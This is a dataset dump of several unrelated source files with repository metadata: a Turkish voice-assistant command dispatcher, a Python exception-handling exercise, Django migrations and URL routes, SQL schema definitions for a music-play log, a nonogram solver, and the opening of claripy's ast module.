45278734804df48db80172a886fbefcd6bf1b64f | dd1462c6dd2aacf13113834854be92b119315722 | /commands.py | ff1f0b7e79f927c5cdb5fd2a885a25572c1fbd0c | [] | no_license | voiceassistant-SEDA/Voice-Asistant | 8d9298f2b5e41c0f14c9d8f31de58df1deca0a93 | 7995875fccde96f4745f4c87fc370d81ac7f61ef | refs/heads/main | 2023-05-05T11:45:07.850369 | 2021-05-21T15:45:33 | 2021-05-21T15:45:33 | 369,581,536 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,342 | py | import os
import json
import function
import backend
import random
from fuzzywuzzy import process
import Levenshtein as lev
class Commands:
    """Dispatch recognised (Turkish) voice phrases to assistant actions.

    Command vocabularies are loaded from ``./Data/commands.json`` as a
    two-level mapping ``{command_type: {command_name: [trigger phrases]}}``.
    ``function`` supplies user-profile/search helpers, ``module`` provides
    text-to-speech via ``speak``, and ``neuralNetwork`` is kept for a
    currently-disabled intent-analysis path.
    """

    def __init__(self, function, module, neuralNetwork):
        self.function = function
        self.module = module
        self.neuralNetwork = neuralNetwork
        # The JSON file holds the Turkish trigger phrases for every command.
        with open("./Data/commands.json", "r", encoding='utf8') as file:
            self.commands = json.load(file)

    def Run(self, data):
        """Match ``data`` against the known phrases and execute the command.

        Returns 0 when the assistant should shut down, 1 otherwise.
        """
        data = data.lower()
        # 1) Exact-phrase commands: the whole utterance is a trigger phrase.
        for key in self.commands.keys():
            for command in self.commands[key]:
                if data in self.commands[key][command]:
                    return self.Execute(command, key)
        # 2) Search commands: a single word is the trigger, the remaining
        #    words form the query text.
        words = data.split(" ")
        for command in self.commands["search"].keys():
            for word in words:
                if word in self.commands["search"][command]:
                    # Fixed: build the query from a copy instead of mutating
                    # ``words`` while iterating over it.
                    remaining = list(words)
                    remaining.remove(word)
                    search = ""
                    for term in remaining:
                        search += term + " "
                    return self.Execute(command, "search", search)
        self.module.speak("Ne dediğini anlayamadım.")
        return 1

    def Execute(self, command, commandType, search=""):
        """Perform ``command`` of ``commandType``.

        ``search`` carries the query text for search commands.
        Returns 0 to request shutdown, 1 otherwise.
        """
        # small talk
        if commandType == "sohbetCumleleri":
            if command == "nasilsin":
                self.module.speak(random.choice(self.commands["nasilsindonusCumleleri"]["donus"]))
            elif command == "tesekkur":
                self.module.speak("Rica ederim {}".format(self.function.GetInfo("name")))
            elif command == "iyiyim":
                self.module.speak("Hep iyi ol :)")
        # user-profile updates
        elif commandType == "update":
            if command == "isimguncelle":
                if self.function.UpdateInfo("name"):
                    self.module.speak("İsmini {} olarak güncelledim".format(self.function.GetInfo("name")))
            elif command == "yasguncelle":
                if self.function.UpdateInfo("age"):
                    self.module.speak("Yaşını {} olarak güncelledim.".format(self.function.GetInfo("age")))
            elif command == "sehirguncelle":
                if self.function.UpdateInfo("hometown", "city"):
                    self.module.speak("Yaşadığın şehri {} olarak güncelledim.".format(self.function.GetInfo("hometown", "city")))
            elif command == "dogumtarihiguncelle":
                if self.function.UpdateInfo("birthdate"):
                    self.module.speak("Doğum tarihini {} olarak güncelledim.".format(self.function.GetInfo("birthdate")))
            elif command == "okulguncelle":
                if self.function.UpdateInfo("university", "faculty", "department"):
                    self.module.speak("Okul bilgilerini {} olarak güncelledim.".format(self.function.GetInfo("university", "faculty", "department")))
            elif command == "meslekguncelle":
                if self.function.UpdateInfo("job"):
                    self.module.speak("Meslek bilgilerini {} olarak güncelledim.".format(self.function.GetInfo("job")))
        # user-profile queries
        elif commandType == "getInfo":
            if command == "meslekgetir":
                self.module.speak(self.function.GetInfo("job"))
            elif command == "yasgetir":
                self.module.speak(self.function.GetInfo("age"))
            elif command == "sehirgetir":
                self.module.speak(self.function.GetInfo("hometown", "city"))
            elif command == "dogumtarihigetir":
                self.module.speak(self.function.GetInfo("birthdate"))
            elif command == "okulbilgisigetir":
                self.module.speak(self.function.GetInfo("school", "university"))
                self.module.speak(self.function.GetInfo("school", "faculty"))
                self.module.speak(self.function.GetInfo("school", "department"))
        # assistant self-description
        elif commandType == "asistanInfo":
            if command == "kendinitanit":
                self.module.speak("Merhabalar benim adım Seda. Ben bir sesli asistanım")
            elif command == "isimsoru":
                self.module.speak("Benim adım Seda")
        # clock / calendar
        elif commandType == "timeFunctions":
            if command == "saatSoru":
                self.module.speak("Şu an saat " + self.function.Clock())
            elif command == "tarihSoru":
                self.module.speak("Bugün: " + self.function.Date())
        # canned web searches
        elif commandType == "quickSearch":
            if command == "havaDurumuSoru":
                self.module.speak("İşte bugünkü hava durumu:")
                self.function.Search("Hava durumu")
        # free-form searches (query text arrives in ``search``)
        elif commandType == "search":
            if command == "webAra":
                self.module.speak("İşte senin için bulduklarım: ")
                self.function.Search(search)
            elif command == "musicAra":
                self.function.YoutubePlay(search)
        # shutdown
        elif commandType == "close":
            if command == "kapat":
                self.module.speak("Görüşmek üzere {}".format(self.function.GetInfo("name")))
                return 0
        else:
            # Unknown command type: report and request shutdown
            # (preserves the original behaviour).
            self.module.speak("Bir şeyler ters gitti")
            return 0
        return 1
"73945726+sirmakalender@users.noreply.github.com"
] | 73945726+sirmakalender@users.noreply.github.com |
d8ded25ef10e93c72605b89d85452c69e80636d6 | 9fdc3443090052d31089f8181cfce4d62ca97616 | /exception_handling_advanced_example61.py | aaca7a2d555cedf68e1fb60cee48b451d3e7b846 | [] | no_license | ahmedyoko/python-course-Elzero | 9d82b08e81d597292ee85c0d517d8116d0be0905 | bc11dca9b7ccbccb7c66d6a5b34ded0e6dedc9f8 | refs/heads/master | 2023-07-25T19:44:22.073679 | 2021-09-07T19:35:30 | 2021-09-07T19:35:30 | 399,866,512 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,097 | py | #...........................................
# exception_handling_advanced_examples
# try | except | else | finally
#....................................................
the_file = None
the_tries = 5
while the_tries > 0 :
print(f'{the_tries} tries left')
the_tries -= 1
else :
print('All tries are done')
print('*'*50)
the_file = None
the_tries = 5
while the_tries > 0 :
try : # try to open the file
print('enter the file name with the absolute path to open')
print(f'you have {the_tries} tries left')
print('Example => D:\python\file\yourfile.extension')
file_name_and_path = input('file name => : ').strip().lower()
the_file = open(file_name_and_path,'r')
print(the_file.read())
break
except FileNotFoundError:
print('the file not found please be sure the name is valid')
the_tries -= 1
except :
print('error happens')
finally :
if the_file is not None :
the_file.close()
print('the file is closed')
else :
print('All tries are done') | [
"aos438479@gmail.com"
] | aos438479@gmail.com |
11e7feb68dc8e7c7d92ddb397418250a2ca1228e | eb3cd8723752e34e46728d02d5f95f3e8e7a864d | /Django/myvenv/bin/chardetect-3.8 | d426c822917bb3d16d6de63f05b1eeafdc98791e | [] | no_license | AbhisarSaraswat/Projects | bdf5b455e6f2480401d646c1115be1a79de6b83d | 59fe23b803a3d7617b26ecec4259c418704d4cc7 | refs/heads/master | 2021-11-17T09:51:32.410418 | 2021-05-21T10:42:31 | 2021-05-21T10:42:31 | 168,728,445 | 0 | 0 | null | 2021-09-22T19:50:09 | 2019-02-01T16:40:42 | Python | UTF-8 | Python | false | false | 245 | 8 | #!/home/lucifer/Projects/myvenv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from chardet.cli.chardetect import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"abhisarsaraswat@gmail.com"
] | abhisarsaraswat@gmail.com |
de075cc155d45012e62fee4fd10dbfd477ea0b69 | 5e0ef0a177306aa205493259cc274be7bb72b9eb | /login_and_registration/apps/log_regs_app/urls.py | 0167a0fd2c5be22b28dbfc5dee64462961a66956 | [] | no_license | reinib/PythonDjangoCD | 07654f45e6e339cb3091d66d7bfccb04a46111d1 | 5fef1906a90c997c13a17ef9aec0df30733d5ea8 | refs/heads/master | 2020-04-11T10:31:42.034181 | 2018-12-14T01:55:06 | 2018-12-14T01:55:06 | 161,717,686 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 259 | py | from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^$', views.index),
url(r'^validate_register$', views.validate_register),
url(r'^users/(?P<id>\d+)$', views.success),
url(r'^validate_login$', views.validate_login),
]
| [
"brent.reininger89@gmail.com"
] | brent.reininger89@gmail.com |
fd5b3d07a2a0a980e3a2da89214375a9c7a9d6ec | 1cfb61bb6cee6c8978ad50956d5af36edeb7ee6f | /menu/migrations/0007_auto_20161007_1750.py | 21534b135687d6b66964406bad09b712e06dffb0 | [] | no_license | greenmails2001/analytics | 221a2264e8a9db63df9ab57fa6393b1e0df62052 | cfde53d5402f302e904b96991d67a0c9a210a6c9 | refs/heads/master | 2021-01-11T05:43:43.666368 | 2016-10-31T14:45:11 | 2016-10-31T14:45:11 | 71,340,991 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,978 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: renames the audit columns ``created``/``updated`` to
    ``createddate``/``updateddate`` on every menu model."""
    dependencies = [
        ('menu', '0006_auto_20161005_1327'),
    ]
    operations = [
        # File
        migrations.RenameField(
            model_name='file',
            old_name='created',
            new_name='createddate',
        ),
        migrations.RenameField(
            model_name='file',
            old_name='updated',
            new_name='updateddate',
        ),
        # Image
        migrations.RenameField(
            model_name='image',
            old_name='created',
            new_name='createddate',
        ),
        migrations.RenameField(
            model_name='image',
            old_name='updated',
            new_name='updateddate',
        ),
        # MenuDetail
        migrations.RenameField(
            model_name='menudetail',
            old_name='created',
            new_name='createddate',
        ),
        migrations.RenameField(
            model_name='menudetail',
            old_name='updated',
            new_name='updateddate',
        ),
        # MenuHeader
        migrations.RenameField(
            model_name='menuheader',
            old_name='created',
            new_name='createddate',
        ),
        migrations.RenameField(
            model_name='menuheader',
            old_name='updated',
            new_name='updateddate',
        ),
        # Text
        migrations.RenameField(
            model_name='text',
            old_name='created',
            new_name='createddate',
        ),
        migrations.RenameField(
            model_name='text',
            old_name='updated',
            new_name='updateddate',
        ),
        # Video
        migrations.RenameField(
            model_name='video',
            old_name='created',
            new_name='createddate',
        ),
        migrations.RenameField(
            model_name='video',
            old_name='updated',
            new_name='updateddate',
        ),
    ]
| [
"greenmails2001@gmail.com"
] | greenmails2001@gmail.com |
c2ae54754ea651fb4d0e578fe907000e3bf0da28 | f1efbd5d8039e95809ad8d313bd1a9c96d51cbf9 | /sql_queries.py | 0bbbb3f48c5d256f37eb83270cec170d4660c9b2 | [] | no_license | WittmannF/data-engineering-projects-postgres | 48a7c889133c6d17af825ef4ce1d59e5b6b41e50 | 5b3200c8977d6162d56f40247e8390d028c0ad8c | refs/heads/main | 2023-02-15T18:11:39.796621 | 2021-01-05T21:44:14 | 2021-01-05T21:44:14 | 326,008,955 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,191 | py | # DROP TABLES
# DROP TABLE statements — issued before CREATE so the schema scripts are rerunnable.
songplay_table_drop = "DROP TABLE IF EXISTS songplays;"
user_table_drop = "DROP TABLE IF EXISTS users;"
song_table_drop = "DROP TABLE IF EXISTS songs;"
artist_table_drop = "DROP TABLE IF EXISTS artists;"
time_table_drop = "DROP TABLE IF EXISTS time;"
# CREATE TABLES
songplay_table_create = ("""
CREATE TABLE songplays (
songplay_id SERIAL PRIMARY KEY,
start_time BIGINT NOT NULL,
user_id INT,
level VARCHAR,
song_id VARCHAR,
artist_id VARCHAR,
session_id INT,
location VARCHAR,
user_agent VARCHAR
);
""")
user_table_create = ("""
CREATE TABLE users (
user_id INT PRIMARY KEY,
first_name VARCHAR,
last_name VARCHAR,
gender VARCHAR,
level VARCHAR
);
""")
song_table_create = ("""
CREATE TABLE songs (
song_id VARCHAR PRIMARY KEY,
title VARCHAR,
artist_id VARCHAR NOT NULL,
year INT,
duration FLOAT
);
""")
artist_table_create = ("""
CREATE TABLE artists (
artist_id VARCHAR PRIMARY KEY,
name VARCHAR,
location VARCHAR,
latitude FLOAT,
longitude FLOAT
);
""")
time_table_create = ("""
CREATE TABLE time (
start_time BIGINT PRIMARY KEY,
hour INT,
day INT,
week INT,
month INT,
year INT,
weekday INT
);
""")
# INSERT RECORDS
songplay_table_insert = ("""
INSERT INTO songplays (
start_time,
user_id,
level,
song_id,
artist_id,
session_id,
location,
user_agent)
VALUES ( %s, %s, %s, %s, %s, %s, %s, %s);
""")
user_table_insert = ("""
INSERT INTO users (
user_id,
first_name,
last_name,
gender,
level)
VALUES (%s, %s, %s, %s, %s)
ON CONFLICT (user_id)
DO UPDATE SET level = EXCLUDED.level;
""")
song_table_insert = ("""
INSERT INTO songs (
song_id,
title,
artist_id,
year,
duration)
VALUES (%s, %s, %s, %s, %s)
ON CONFLICT (song_id)
DO NOTHING;
""")
artist_table_insert = ("""
INSERT INTO artists (
artist_id,
name,
location,
latitude,
longitude)
VALUES (%s, %s, %s, %s, %s)
ON CONFLICT (artist_id)
DO NOTHING;
""")
time_table_insert = ("""
INSERT INTO time (
start_time,
hour,
day,
week,
month,
year,
weekday)
VALUES (%s, %s, %s, %s, %s, %s, %s)
ON CONFLICT (start_time)
DO NOTHING;
""")
# FIND SONGS
# Resolve a log record's (title, artist name, duration) to (song_id, artist_id).
song_select = ("""
SELECT songs.song_id, artists.artist_id
FROM songs INNER JOIN artists ON (songs.artist_id = artists.artist_id)
WHERE songs.title = %s AND artists.name = %s AND songs.duration = %s
;
""")
# QUERY LISTS
# Consumed by create_tables.py to (re)build the schema in order.
create_table_queries = [
    songplay_table_create,
    user_table_create,
    song_table_create,
    artist_table_create,
    time_table_create
]
drop_table_queries = [
    songplay_table_drop,
    user_table_drop,
    song_table_drop,
    artist_table_drop,
    time_table_drop
]
"fernando.wittmann@gmail.com"
] | fernando.wittmann@gmail.com |
58cbe82bcc8bd6afeed52101fca9d77621105eef | 4be56098894a95da5964622fc4102b69e4530ab6 | /题库/1399.页面推荐.py | 5a140da6d4ab9fa5c70e7d7e978fdf740737d005 | [] | no_license | ACENDER/LeetCode | 7c7c7ecc8d0cc52215272f47ec34638637fae7ac | 3383b09ab1246651b1d7b56ab426a456f56a4ece | refs/heads/master | 2023-03-13T19:19:07.084141 | 2021-03-15T09:29:21 | 2021-03-15T09:29:21 | 299,332,864 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 80 | py | # !/usr/bin/env python3
# -*- coding: utf-8 -*-
# @File : 1399.页面推荐.py
| [
"1641429327@qq.com"
] | 1641429327@qq.com |
4c87054e4f6b517be8dae9e5d95da62f3c6a37aa | 47884bb53ffb293ccfff5e4c808915e00f6cc0d3 | /archive/timeDelta.py | d80a440ffeeba2400e92fbacc59bb5a9a95990b1 | [] | no_license | andyschultz/Scripts | f0b75b537b825fa7ff89efec63299e2a697790f7 | 7d3b57e292ce8f48ac40553a51c052bbc1c975f8 | refs/heads/master | 2021-01-13T01:29:40.853048 | 2015-04-30T17:17:08 | 2015-04-30T17:17:08 | 26,029,990 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 583 | py | #!/usr/local/bin/python3
import pandas as pd, numpy as np,sys
def buildDelta(file):
    """Append a cumulative elapsed-hours column to a tab-separated log.

    The first column of ``file`` (after one skipped header line) must hold
    timestamps. The augmented table is written next to the input as
    ``<name>-delta.txt``.
    """
    df = pd.read_csv(file, sep="\t", index_col=False, skiprows=1)
    df.iloc[:, 0] = pd.to_datetime(df.iloc[:, 0])
    df.insert(1, "Cumulative Time", "NaN")
    # Hours elapsed since the first row: per-row deltas, accumulated.
    # Fixed: fill the first delta with a Timedelta, not the int 0, so the
    # column stays timedelta-typed on modern pandas.
    df["Cumulative Time"] = (df.iloc[:, 0] - df.iloc[:, 0].shift()).fillna(pd.Timedelta(0))
    df["Cumulative Time"] = df["Cumulative Time"].cumsum(axis=0)
    df["Cumulative Time"] = df["Cumulative Time"] / np.timedelta64(1, 'h')
    # Fixed: str.rstrip(".txt") strips any trailing '.', 't' or 'x' characters
    # (e.g. "report.txt" -> "repor"); remove the literal suffix instead.
    base = file[:-len(".txt")] if file.endswith(".txt") else file
    df.to_csv(base + "-delta.txt", index=False, sep="\t")


if __name__ == "__main__":
    # Fixed: only touch sys.argv when run as a script, so the module imports cleanly.
    buildDelta(sys.argv[1])
"andy.schultz1@gmail.com"
] | andy.schultz1@gmail.com |
2f9db9f890c9233e5af1669088468a7683d1af35 | 0fb3b73f8e6bb9e931afe4dcfd5cdf4ba888d664 | /awssam/fullfeblog/blog/migrations/0002_auto_20201208_1414.py | b61387acb7dcbe792fb0d7d8887e97d528f46789 | [] | no_license | mrpal39/ev_code | 6c56b1a4412503604260b3346a04ef53a2ba8bf2 | ffa0cf482fa8604b2121957b7b1d68ba63b89522 | refs/heads/master | 2023-03-24T03:43:56.778039 | 2021-03-08T17:48:39 | 2021-03-08T17:48:39 | 345,743,264 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,023 | py | # Generated by Django 3.1.4 on 2020-12-08 14:14
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('blog', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='post',
options={'ordering': ('-publish',)},
),
migrations.RenameField(
model_name='post',
old_name='content',
new_name='body',
),
migrations.RenameField(
model_name='post',
old_name='date_posted',
new_name='publish',
),
migrations.AddField(
model_name='post',
name='created',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),
preserve_default=False,
),
migrations.AddField(
model_name='post',
name='slug',
field=models.SlugField(default=django.utils.timezone.now, max_length=250, unique_for_date='publish'),
preserve_default=False,
),
migrations.AddField(
model_name='post',
name='status',
field=models.CharField(choices=[('draft', 'Draft'), ('published', 'Published')], default='draft', max_length=10),
),
migrations.AddField(
model_name='post',
name='updated',
field=models.DateTimeField(auto_now=True),
),
migrations.AlterField(
model_name='post',
name='author',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='blog_posts', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='post',
name='title',
field=models.CharField(max_length=250),
),
]
| [
"rp9545416@gmail.com"
] | rp9545416@gmail.com |
840f45903a811282a9e7105496d723fef512547a | 743778017a0e775832e45fc05d9a056604f608ad | /km71/Guro_Dmytro/4/Task7.py | e6d342044e39db64385b0d1b3e66988e2430196c | [] | no_license | Kalinia/amis_python71 | fed5ff37a5909c090a53962daa689141498755b1 | 0123af48b1eaa6d752409b1b643f548c6b0e4ab8 | refs/heads/master | 2021-05-07T17:24:21.974699 | 2017-12-21T22:13:00 | 2017-12-21T22:13:00 | 108,726,150 | 0 | 0 | null | 2017-10-29T10:54:14 | 2017-10-29T10:54:14 | null | UTF-8 | Python | false | false | 590 | py | while True:
try:
x1 = int(input())
break
except:
print("Please enter number")
while True:
try:
y1=int(input())
break
except:
print("Please enter number")
while True:
try:
x2=int(input())
break
except:
print("Please enter number")
while True:
try:
y2=int(input())
break
except:
print("Please enter number")
if (x1+x2)%2==0 and (y1+y2)%2==0:
print("YES")
elif (x1+x2)%2!=0 and (y1+y2)%2!=0:
print("YES")
else:
print("NO")
| [
"noreply@github.com"
] | Kalinia.noreply@github.com |
e886796a357ded12e7a87bd69fcd9177507e8a8b | 348d736636ddc3490df1b47fafbe26d10124148e | /camera_pi.py | d502e24cc78b9b0ae47ee12cd1dd097b5bc64041 | [] | no_license | HensonZl/hackrfpibot | 2636fbf19627913ddc754f5acc89d866612cb672 | 4eb730f5add931d0d26f2ec1177994dee5417012 | refs/heads/master | 2020-05-18T13:11:47.446115 | 2019-05-01T21:57:28 | 2019-05-01T21:57:28 | 184,431,429 | 16 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,986 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# camera_pi.py
#
# NOT MY SCRIPT this was used from https://www.hackster.io/ruchir1674/video-streaming-on-flask-server-using-rpi-ef3d75
# Look at the above link to get the documentation for the following script.
import time
import io
import threading
import picamera
class Camera(object):
    """Shared Pi-camera wrapper: one background thread captures JPEG frames
    continuously; clients pull the latest frame via get_frame()."""
    thread = None  # background thread that reads frames from camera
    frame = None  # current frame is stored here by background thread
    last_access = 0  # time of last client access to the camera
    def initialize(self):
        """Start the capture thread (at most once) and block until a frame exists."""
        if Camera.thread is None:
            # start background frame thread
            Camera.thread = threading.Thread(target=self._thread)
            Camera.thread.start()
            # wait until frames start to be available
            # (busy-wait; sleep(0) yields the GIL to the capture thread)
            while self.frame is None:
                time.sleep(0)
    def get_frame(self):
        """Return the most recent JPEG frame, starting the camera if needed."""
        Camera.last_access = time.time()
        self.initialize()
        return self.frame
    @classmethod
    def _thread(cls):
        """Capture loop: store each JPEG into cls.frame until clients go idle."""
        with picamera.PiCamera() as camera:
            # camera setup
            camera.resolution = (320, 240)
            camera.hflip = True
            camera.vflip = True
            # let camera warm up
            camera.start_preview()
            time.sleep(2)
            stream = io.BytesIO()
            for foo in camera.capture_continuous(stream, 'jpeg',
                use_video_port=True):
                # store frame
                stream.seek(0)
                cls.frame = stream.read()
                # reset stream for next frame
                stream.seek(0)
                stream.truncate()
                # if there hasn't been any clients asking for frames in
                # the last 10 seconds stop the thread
                if time.time() - cls.last_access > 10:
                    break
        # Allow a later get_frame() call to restart the capture thread.
        cls.thread = None
"noreply@github.com"
] | HensonZl.noreply@github.com |
64cba2c2b0ca9bb48817b6596678847d35379587 | 2428f771974183f86dd76a5ab9621097bba85d4e | /solve.py | 28c74e44d34b35b2770e55b9d057a465143ad34e | [] | no_license | Oripy/nonogram-solver | 3bdcffd282e49b117a10e475b65734e6ae23fa09 | d81b79caac04f8666bc39cba2a8fe95e592ab9e3 | refs/heads/master | 2021-01-15T16:00:47.186485 | 2011-07-18T08:40:48 | 2011-07-18T08:40:48 | 3,313,624 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,922 | py | #!/usr/bin/env python
import sys
import string
import copy
import types
from data_diff import data_diff
def get_permutations(counts, length):
"""
>>> get_permutations([], 1)
[[False]]
>>> get_permutations([1], 1)
[[True]]
>>> get_permutations([2], 3)
[[True, True, False], [False, True, True]]
>>> get_permutations([2], 4)
[[True, True, False, False], [False, True, True, False], [False, False, True, True]]
>>> get_permutations([1, 1], 4)
[[True, False, True, False], [True, False, False, True], [False, True, False, True]]
>>> get_permutations([1, 2], 5)
[[True, False, True, True, False], [True, False, False, True, True], [False, True, False, True, True]]
>>> get_permutations([1, 1, 2], 7)
[[True, False, True, False, True, True, False], [True, False, True, False, False, True, True], [True, False, False, True, False, True, True], [False, True, False, True, False, True, True]]
"""
if len(counts) == 0:
row = []
for x in xrange(length):
row.append(False)
return [row]
permutations = []
for start in xrange(length - counts[0] + 1):
permutation = []
for x in xrange(start):
permutation.append(False)
for x in xrange(start, start + counts[0]):
permutation.append(True)
x = start + counts[0]
if x < length:
permutation.append(False)
x += 1
if x == length and len(counts) == 0:
permutations.append(permutation)
break
sub_start = x
sub_rows = get_permutations(counts[1:len(counts)], length - sub_start)
for sub_row in sub_rows:
sub_permutation = copy.deepcopy(permutation)
for x in xrange(sub_start, length):
sub_permutation.append(sub_row[x-sub_start])
permutations.append(sub_permutation)
return permutations
def solve_row(counts, row):
"""
>>> solve_row([], [None])
[False]
>>> solve_row([1], [None])
[True]
>>> solve_row([2], [False, None, None])
[False, True, True]
>>> solve_row([2], [True, None, None])
[True, True, False]
>>> solve_row([2], [None, None, None])
[None, True, None]
>>> solve_row([2], [None, False, None, None])
[False, False, True, True]
>>> solve_row([2], [None, False, None, None, None, None])
[False, False, None, None, None, None]
row already completed:
>>> solve_row([1], [None, True, None])
[False, True, False]
too far away to be able to complete
>>> solve_row([2], [None, True, None, None])
[None, True, None, False]
assume positions of all except one count
>>> solve_row([1, 2], [None, None, None, None, None])
[None, None, None, True, None]
>>> solve_row([1, 1, 1, 2], [None, None, None, None, None, None, None, None, None])
[None, None, None, None, None, None, None, True, None]
>>> solve_row([1, 7], [None, False, True, None, None, None, None, None, None, None])
[True, False, True, True, True, True, True, True, True, False]
doesn't fit on one size of False
>>> solve_row([1, 1], [None, False, None, None])
[True, False, None, None]
doesn't fit on one size of False
>>> solve_row([1, 2], [None, None, False, None, None, None])
[None, None, False, None, True, None]
already started on one side of False
>>> solve_row([4], [None, None, None, None, False, None, True, None, None, None])
[False, False, False, False, False, None, True, True, True, None]
"""
permutations = get_permutations(counts, len(row))
valid_permutations = []
for permutation in permutations:
valid = True
for x in xrange(len(row)):
if row[x] != None and row[x] != permutation[x]:
valid = False
if valid:
valid_permutations.append(permutation)
new_row = copy.deepcopy(valid_permutations[0])
for permutation in valid_permutations:
for x in xrange(len(row)):
if new_row[x] != permutation[x]:
new_row[x] = None
return new_row
def solve(row_counts, col_counts, grid):
width = len(grid[0])
height = len(grid)
changed = True
while changed:
changed = False
for x in xrange(width):
col = []
for y in xrange(height):
col.append(grid[y][x])
col = solve_row(col_counts[x], col)
for y in xrange(height):
if col[y] != None and grid[y][x] != col[y]:
changed = True
grid[y][x] = col[y]
for y in xrange(height):
row = copy.deepcopy(grid[y])
row = solve_row(row_counts[y], row)
for x in xrange(1):
if row[x] != None and grid[y][x] != row[x]:
changed = True
grid[y] = row
return grid
def check_solution(grid):
row_counts = []
col_counts = []
for y in xrange(len(grid)):
row_counts.append([0])
for x in xrange(len(grid[0])):
col_counts.append([0])
for y in xrange(len(grid)):
for x in xrange(len(grid[0])):
if grid[y][x] == True:
row_counts[y][-1] += 1
col_counts[x][-1] += 1
elif grid[y][x] == False:
if row_counts[y][-1] != 0:
row_counts[y].append(0)
if col_counts[x][-1] != 0:
col_counts[x].append(0)
for y in xrange(len(grid)):
if row_counts[y][-1] == 0:
row_counts[y].pop()
for x in xrange(len(grid[0])):
if col_counts[x][-1] == 0:
col_counts[x].pop()
return [row_counts, col_counts]
def solve_from_file(filename):
f = open(filename)
lines = f.readlines()
#convert into a list of lists and remove whitespace
grid = []
width = 0
for line in lines:
line = line.rstrip()
if line:
row = string.split(line, "\t")
width = max(width, len(row))
grid.append(row)
height = len(grid)
#convert into integers and normalize row width
y = 0
for row in grid:
new_row = []
for x in xrange(width):
try:
i = int(row[x])
except IndexError:
i = None
except ValueError:
if row[x] == 'T':
i = True
elif row[x] == 'F':
i = False
else:
i = None
new_row.append(i)
grid[y] = new_row
y += 1
#measure height and width of inner grid
x = width - 1
y = height - 1
while x >= 0:
if type(grid[y][x]) == types.IntType:
break
x -= 1
inner_width = width - x - 1
x = width - 1
y = height - 1
while y >= 0:
if type(grid[y][x]) == types.IntType:
break
y -= 1
inner_height = len(grid) - y - 1
print "board size: %dx%d" % (inner_width, inner_height)
#ensure inner grid is valid
for x in xrange(width - inner_width, width):
for y in xrange(height - inner_height, height):
if type(grid[y][x]) != types.NoneType and type(grid[y][x]) != types.BooleanType:
print 'invalid board'
exit()
#ensure upper left is empty
for x in xrange(width - inner_width):
for y in xrange(height - inner_height):
if grid[y][x] != None:
print 'invalid board'
exit()
counts_width = width - inner_width
counts_height = height - inner_height
#populate row counts
row_counts = []
for y in xrange(counts_height, height):
counts = []
for x in xrange(counts_width):
count = grid[y][x]
if count:
counts.append(count)
row_counts.append(counts)
#populate column counts
col_counts = []
for x in xrange(counts_width, width):
counts = []
for y in xrange(counts_height):
count = grid[y][x]
if count:
counts.append(count)
col_counts.append(counts)
#redo grid
width = inner_width
height = inner_height
inner_grid = []
for y in xrange(height):
inner_grid.append([])
for x in xrange(width):
inner_grid[y].append(grid[y+counts_height][x+counts_width])
grid = solve(row_counts, col_counts, inner_grid)
complete = True
for row in grid:
for item in row:
if item == None:
complete = False
if complete:
l = check_solution(grid)
if data_diff(l[0], row_counts) or data_diff(l[1], col_counts):
print 'FAIL!'
exit()
for y in xrange(counts_height):
for x in xrange(counts_width):
sys.stdout.write("\t")
for counts in col_counts:
try:
sys.stdout.write(str(counts[-counts_height+y]))
except:
pass
sys.stdout.write("\t")
print
y = 0
for row in grid:
for x in xrange(counts_width):
try:
sys.stdout.write(str(row_counts[y][-counts_width+x]))
except:
pass
sys.stdout.write("\t")
for square in row:
if square == True:
sys.stdout.write('T')
elif square == False:
sys.stdout.write('F')
sys.stdout.write("\t")
print
y += 1
if __name__ == "__main__":
if len(sys.argv) > 1:
solve_from_file(sys.argv[1])
else:
import doctest
doctest.testmod() | [
"repalviglator@yahoo.com"
] | repalviglator@yahoo.com |
0da90c73bc71313602b59d4b1cce999930cd4017 | 637669abf38aa06d786458bcb552d0d5dc188302 | /claripy/ast/__init__.py | 2da826a5b43d467502f3d34eadb856d283ede3f4 | [
"BSD-2-Clause"
] | permissive | angr/claripy | c5603b52f829a9b29630ed6665ab7ec294cb8157 | b35449fecd129dc46a0cabdd6499354e89b38a68 | refs/heads/master | 2023-09-05T18:48:19.736126 | 2023-09-05T17:17:45 | 2023-09-05T17:17:45 | 40,328,505 | 260 | 115 | BSD-2-Clause | 2023-09-11T22:09:06 | 2015-08-06T21:50:19 | Python | UTF-8 | Python | false | false | 1,376 | py | # pylint:disable=redefined-outer-name
from typing import TYPE_CHECKING
# Mypy is severely confused by this delayed import trickery, but works if we just pretend that the import
# happens here already
if TYPE_CHECKING:
    from .bits import Bits
    from .bv import BV
    from .vs import VS
    from .fp import FP
    from .bool import Bool, true, false
    from .int import Int
    from .base import Base
    from .strings import String
    from .. import ops as all_operations
else:
    # At runtime the real classes are bound later by _import(); until then the
    # names exist only as inert placeholders so that early attribute access
    # does not raise NameError.
    Bits = lambda *args, **kwargs: None
    BV = lambda *args, **kwargs: None
    VS = lambda *args, **kwargs: None
    FP = lambda *args, **kwargs: None
    Bool = lambda *args, **kwargs: None
    Int = lambda *args, **kwargs: None
    Base = lambda *args, **kwargs: None
    true = lambda *args, **kwargs: None
    false = lambda *args, **kwargs: None
